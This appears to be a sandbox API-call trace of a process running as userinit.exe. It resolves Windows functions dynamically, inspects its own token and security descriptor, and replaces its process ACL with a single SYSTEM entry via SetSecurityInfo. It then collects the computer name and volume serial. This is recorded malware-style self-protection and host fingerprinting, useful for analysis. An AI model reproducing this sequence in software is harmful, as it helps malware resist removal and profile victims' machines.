[0100.469] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2b0f770, pSourceSid=0x606f70*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0) | out: pDestinationSid=0x2b0f770*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1
[0100.469] IsValidSid (pSid=0x2b0f770*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1
[0100.469] ConvertSidToStringSidA () returned 0x1
[0100.469] LocalFree (hMem=0x5fc1c8) returned 0x0
[0100.469] LocalFree (hMem=0x606f70) returned 0x0
[0100.469] ConvertStringSidToSidA () returned 0x1
[0100.469] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2b0f7f8, pSourceSid=0x606f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x0) | out: pDestinationSid=0x2b0f7f8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x0)) returned 1
[0100.469] IsValidSid (pSid=0x2b0f7f8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x0)) returned 1
[0100.469] ConvertSidToStringSidA () returned 0x1
[0100.469] LocalFree (hMem=0x5fc1c8) returned 0x0
[0100.469] LocalFree (hMem=0x606f40) returned 0x0
[0100.469] ConvertStringSidToSidA () returned 0x1
[0100.469] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2b0f880, pSourceSid=0x606f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14) | out: pDestinationSid=0x2b0f880*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14)) returned 1
[0100.469] IsValidSid (pSid=0x2b0f880*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14)) returned 1
[0100.469] ConvertSidToStringSidA () returned 0x1
[0100.469] LocalFree (hMem=0x606f58) returned 0x0
[0100.469] LocalFree (hMem=0x606f40) returned 0x0
[0100.469] ConvertStringSidToSidA () returned 0x1
[0100.470] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2b0f90c, pSourceSid=0x606f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13) | out: pDestinationSid=0x2b0f90c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13)) returned 1
[0100.470] IsValidSid (pSid=0x2b0f90c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13)) returned 1
[0100.470] ConvertSidToStringSidA () returned 0x1
[0100.470] LocalFree (hMem=0x606f58) returned 0x0
[0100.470] LocalFree (hMem=0x606f40) returned 0x0
[0100.470] ConvertStringSidToSidA () returned 0x1
[0100.470] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2b0f998, pSourceSid=0x606f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xa) | out: pDestinationSid=0x2b0f998*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xa)) returned 1
[0100.470] IsValidSid (pSid=0x2b0f998*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xa)) returned 1
[0100.470] ConvertSidToStringSidA () returned 0x1
[0100.470] LocalFree (hMem=0x606f58) returned 0x0
[0100.470] LocalFree (hMem=0x606f40) returned 0x0
[0100.470] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0100.470] GetProcAddress (hModule=0x75370000, lpProcName="GetCurrentThread") returned 0x753c3351
[0100.470] GetCurrentThread () returned 0xfffffffe
[0100.470] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0100.470] GetProcAddress (hModule=0x76da0000, lpProcName="OpenThreadToken") returned 0x76db432c
[0100.470] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0xf01ff, OpenAsSelf=1, TokenHandle=0x22ea2c | out: TokenHandle=0x22ea2c*=0x29e3756) returned 0
[0100.470] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0100.470] GetProcAddress (hModule=0x75370000, lpProcName="GetCurrentProcess") returned 0x753bcdcf
[0100.470] GetCurrentProcess () returned 0xffffffff
[0100.471] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0100.471] GetProcAddress (hModule=0x76da0000, lpProcName="OpenProcessToken") returned 0x76db4304
[0100.471] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0xf01ff, TokenHandle=0x2b0fa3c | out: TokenHandle=0x2b0fa3c*=0x1d0) returned 1
[0100.471] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0100.471] GetProcAddress (hModule=0x76da0000, lpProcName="MapGenericMask") returned 0x76dc7a73
[0100.471] MapGenericMask (in: AccessMask=0x22e8a4, GenericMapping=0x22e8a8 | out: AccessMask=0x22e8a4)
[0100.471] MapGenericMask (in: AccessMask=0x22e9d8, GenericMapping=0x22e9dc | out: AccessMask=0x22e9d8)
[0100.471] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0100.471] GetProcAddress (hModule=0x76da0000, lpProcName="GetTokenInformation") returned 0x76db431c
[0100.471] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x22e9ec | out: TokenInformation=0x0, ReturnLength=0x22e9ec) returned 0
[0100.471] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0100.471] GetProcAddress (hModule=0x75370000, lpProcName="GetLastError") returned 0x753bbf00
[0100.471] GetLastError () returned 0x7a
[0100.472] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0100.472] GetProcAddress (hModule=0x75370000, lpProcName="HeapAlloc") returned 0x76f72dd6
[0100.472] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x1, TokenInformation=0x600780, TokenInformationLength=0x24, ReturnLength=0x22ea10 | out: TokenInformation=0x600780, ReturnLength=0x22ea10) returned 1
[0100.472] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2b0fab0, pSourceSid=0x600788*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)) | out: pDestinationSid=0x2b0fab0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0100.472] IsValidSid (pSid=0x2b0fab0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0100.472] ConvertSidToStringSidA () returned 0x1
[0100.472] LocalFree (hMem=0x5f9e80) returned 0x0
[0100.472] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0100.472] GetProcAddress (hModule=0x75370000, lpProcName="HeapFree") returned 0x753bbbd0
[0100.472] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2b0fb34, pSourceSid=0x2b0fab0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)) | out: pDestinationSid=0x2b0fb34*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0100.472] IsValidSid (pSid=0x2b0fb34*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0100.472] ConvertSidToStringSidA () returned 0x1
[0100.472] LocalFree (hMem=0x5f9e80) returned 0x0
[0100.472] IsValidSid (pSid=0x2b0fb34*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0100.472] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0100.472] GetProcAddress (hModule=0x75370000, lpProcName="CloseHandle") returned 0x753bca7c
[0100.472] CloseHandle (hObject=0x1d0) returned 1
[0100.472] ConvertStringSidToSidA () returned 0x1
[0100.472] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2b0fa54, pSourceSid=0x606f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x1000) | out: pDestinationSid=0x2b0fa54*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x1000)) returned 1
[0100.473] IsValidSid (pSid=0x2b0fa54*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x1000)) returned 1
[0100.473] ConvertSidToStringSidA () returned 0x1
[0100.473] LocalFree (hMem=0x606f58) returned 0x0
[0100.473] LocalFree (hMem=0x606f40) returned 0x0
[0100.473] ConvertStringSidToSidA () returned 0x1
[0100.473] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2b0fae0, pSourceSid=0x606f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000) | out: pDestinationSid=0x2b0fae0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 1
[0100.473] IsValidSid (pSid=0x2b0fae0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 1
[0100.473] ConvertSidToStringSidA () returned 0x1
[0100.473] LocalFree (hMem=0x606f58) returned 0x0
[0100.473] LocalFree (hMem=0x606f40) returned 0x0
[0100.473] ConvertStringSidToSidA () returned 0x1
[0100.473] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2b0fbfc, pSourceSid=0x606f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000) | out: pDestinationSid=0x2b0fbfc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 1
[0100.473] IsValidSid (pSid=0x2b0fbfc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 1
[0100.473] ConvertSidToStringSidA () returned 0x1
[0100.473] LocalFree (hMem=0x606f58) returned 0x0
[0100.473] LocalFree (hMem=0x606f40) returned 0x0
[0100.473] ConvertStringSidToSidA () returned 0x1
[0100.473] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2b0fc8c, pSourceSid=0x606f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000) | out: pDestinationSid=0x2b0fc8c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000)) returned 1
[0100.473] IsValidSid (pSid=0x2b0fc8c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000)) returned 1
[0100.473] ConvertSidToStringSidA () returned 0x1
[0100.473] LocalFree (hMem=0x606f58) returned 0x0
[0100.473] LocalFree (hMem=0x606f40) returned 0x0
[0100.473] ConvertStringSidToSidA () returned 0x1
[0100.473] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2b0fd1c, pSourceSid=0x606f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x5000) | out: pDestinationSid=0x2b0fd1c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x5000)) returned 1
[0100.473] IsValidSid (pSid=0x2b0fd1c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x5000)) returned 1
[0100.473] ConvertSidToStringSidA () returned 0x1
[0100.473] LocalFree (hMem=0x606f58) returned 0x0
[0100.473] LocalFree (hMem=0x606f40) returned 0x0
[0100.473] GetCurrentProcessId () returned 0xf74
[0100.473] OpenProcess (dwDesiredAccess=0x60000, bInheritHandle=0, dwProcessId=0xf74) returned 0x1d0
[0100.473] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0100.474] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityInfo") returned 0x76dab3e4
[0100.474] GetSecurityInfo () returned 0x0
[0100.476] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0100.476] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorControl") returned 0x76daaddf
[0100.476] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x600f28, pControl=0x22e7b2, lpdwRevision=0x22e7ac | out: pControl=0x22e7b2, lpdwRevision=0x22e7ac) returned 1
[0100.477] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0100.477] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorOwner") returned 0x76daadf7
[0100.477] GetSecurityDescriptorOwner (in: pSecurityDescriptor=0x600f28, pOwner=0x22e7a8, lpbOwnerDefaulted=0x22e79c | out: pOwner=0x22e7a8*=0x0, lpbOwnerDefaulted=0x22e79c) returned 1
[0100.477] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0100.477] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorGroup") returned 0x76daae27
[0100.477] GetSecurityDescriptorGroup (in: pSecurityDescriptor=0x600f28, pGroup=0x22e7a8, lpbGroupDefaulted=0x22e79c | out: pGroup=0x22e7a8*=0x0, lpbGroupDefaulted=0x22e79c) returned 1
[0100.477] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0100.477] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorDacl") returned 0x76db41a6
[0100.477] GetSecurityDescriptorDacl (in: pSecurityDescriptor=0x600f28, lpbDaclPresent=0x22e7a0, pDacl=0x22e794, lpbDaclDefaulted=0x22e79c | out: lpbDaclPresent=0x22e7a0, pDacl=0x22e794, lpbDaclDefaulted=0x22e79c) returned 1
[0100.477] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0100.477] GetProcAddress (hModule=0x76da0000, lpProcName="IsValidAcl") returned 0x76da8523
[0100.477] IsValidAcl (pAcl=0x600f3c) returned 1
[0100.478] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0100.478] GetProcAddress (hModule=0x76da0000, lpProcName="GetAce") returned 0x76db45f0
[0100.478] GetAce (in: pAcl=0x600f3c, dwAceIndex=0x0, pAce=0x22e634 | out: pAce=0x22e634*=0x600f44) returned 1
[0100.478] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2b0fe74, pSourceSid=0x600f4c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x2b0fe74*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0100.478] IsValidSid (pSid=0x2b0fe74*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0100.478] ConvertSidToStringSidA () returned 0x1
[0100.478] LocalFree (hMem=0x607018) returned 0x0
[0100.478] GetAce (in: pAcl=0x600f3c, dwAceIndex=0x1, pAce=0x22e634 | out: pAce=0x22e634*=0x600f5c) returned 1
[0100.478] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2b0ff60, pSourceSid=0x600f64*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12) | out: pDestinationSid=0x2b0ff60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0100.478] IsValidSid (pSid=0x2b0ff60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0100.478] ConvertSidToStringSidA () returned 0x1
[0100.478] LocalFree (hMem=0x607018) returned 0x0
[0100.478] GetAce (in: pAcl=0x600f3c, dwAceIndex=0x2, pAce=0x22e634 | out: pAce=0x22e634*=0x600f70) returned 1
[0100.478] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2b029c0, pSourceSid=0x600f78*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5, [1]=0x0, [2]=0x0)) | out: pDestinationSid=0x2b029c0*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5, [1]=0x0, [2]=0x0))) returned 1
[0100.478] IsValidSid (pSid=0x2b029c0*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5, [1]=0x0, [2]=0x0))) returned 1
[0100.478] ConvertSidToStringSidA () returned 0x1
[0100.478] LocalFree (hMem=0x607018) returned 0x0
[0100.478] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0100.478] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorSacl") returned 0x76db4608
[0100.478] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x600f28, lpbSaclPresent=0x22e7a4, pSacl=0x22e798, lpbSaclDefaulted=0x22e79c | out: lpbSaclPresent=0x22e7a4, pSacl=0x22e798, lpbSaclDefaulted=0x22e79c) returned 1
[0100.478] LocalFree (hMem=0x600f28) returned 0x0
[0100.479] IsValidSid (pSid=0x2b0f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0100.479] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0100.479] GetProcAddress (hModule=0x76da0000, lpProcName="GetLengthSid") returned 0x76db413b
[0100.479] GetLengthSid (pSid=0x2b0f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc
[0100.479] GetLastError () returned 0x0
[0100.479] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0100.479] GetProcAddress (hModule=0x75370000, lpProcName="GlobalAlloc") returned 0x753b9ce1
[0100.479] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0100.479] GetProcAddress (hModule=0x76da0000, lpProcName="InitializeAcl") returned 0x76db45cd
[0100.479] InitializeAcl (in: pAcl=0x607fa8, nAclLength=0x1c, dwAclRevision=0x2 | out: pAcl=0x607fa8) returned 1
[0100.479] IsValidSid (pSid=0x2b0f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0100.479] GetLengthSid (pSid=0x2b0f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc
[0100.479] GetLastError () returned 0x0
[0100.479] IsValidSid (pSid=0x2b0f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0100.480] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0100.480] GetProcAddress (hModule=0x75370000, lpProcName="SetLastError") returned 0x753bbb08
[0100.480] SetLastError (dwErrCode=0x0)
[0100.480] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0100.480] GetProcAddress (hModule=0x76da0000, lpProcName="GetSidSubAuthorityCount") returned 0x76db0e0c
[0100.480] GetSidSubAuthorityCount (pSid=0x2b0f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x2b0f615
[0100.480] GetLastError () returned 0x0
[0100.480] IsValidSid (pSid=0x2b0f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0100.480] SetLastError (dwErrCode=0x0)
[0100.480] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0100.480] GetProcAddress (hModule=0x76da0000, lpProcName="GetSidIdentifierAuthority") returned 0x76daa935
[0100.480] GetSidIdentifierAuthority (pSid=0x2b0f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x2b0f616
[0100.480] GetLastError () returned 0x0
[0100.480] IsValidSid (pSid=0x2b0f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0100.480] IsValidSid (pSid=0x2b0f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0100.480] SetLastError (dwErrCode=0x0)
[0100.480] GetSidSubAuthorityCount (pSid=0x2b0f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x2b0f615
[0100.480] GetLastError () returned 0x0
[0100.480] SetLastError (dwErrCode=0x0)
[0100.481] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0100.481] GetProcAddress (hModule=0x76da0000, lpProcName="GetSidSubAuthority") returned 0x76db0e24
[0100.481] GetSidSubAuthority (pSid=0x2b0f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), nSubAuthority=0x0) returned 0x2b0f61c
[0100.481] GetLastError () returned 0x0
[0100.481] IsValidSid (pSid=0x2b0f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0100.481] GetLengthSid (pSid=0x2b0f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc
[0100.481] GetLastError () returned 0x0
[0100.481] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0100.481] GetProcAddress (hModule=0x76da0000, lpProcName="AddAce") returned 0x76daae0f
[0100.481] AddAce (in: pAcl=0x607fa8, dwAceRevision=0x2, dwStartingAceIndex=0xffffffff, pAceList=0x5f2f90, nAceListLength=0x14 | out: pAcl=0x607fa8) returned 1
[0100.481] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0100.481] GetProcAddress (hModule=0x75370000, lpProcName="GlobalFree") returned 0x753b9cf9
[0100.481] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0100.481] GetProcAddress (hModule=0x76da0000, lpProcName="SetSecurityInfo") returned 0x76da9edf
[0100.482] SetSecurityInfo () returned 0x0
[0100.482] CloseHandle (hObject=0x1d0) returned 1
[0100.482] GetComputerNameA (in: lpBuffer=0x2b0fd84, nSize=0x22ea6c | out: lpBuffer="CRH2YWU7", nSize=0x22ea6c) returned 1
[0100.482] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x22e958, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0100.482] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x22ea54, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x22ea68, lpMaximumComponentLength=0x22ea64, lpFileSystemFlags=0x22ea60, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x22ea68*=0x90c08a66, lpMaximumComponentLength=0x22ea64*=0xff, lpFileSystemFlags=0x22ea60*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0100.483] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x22e960, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
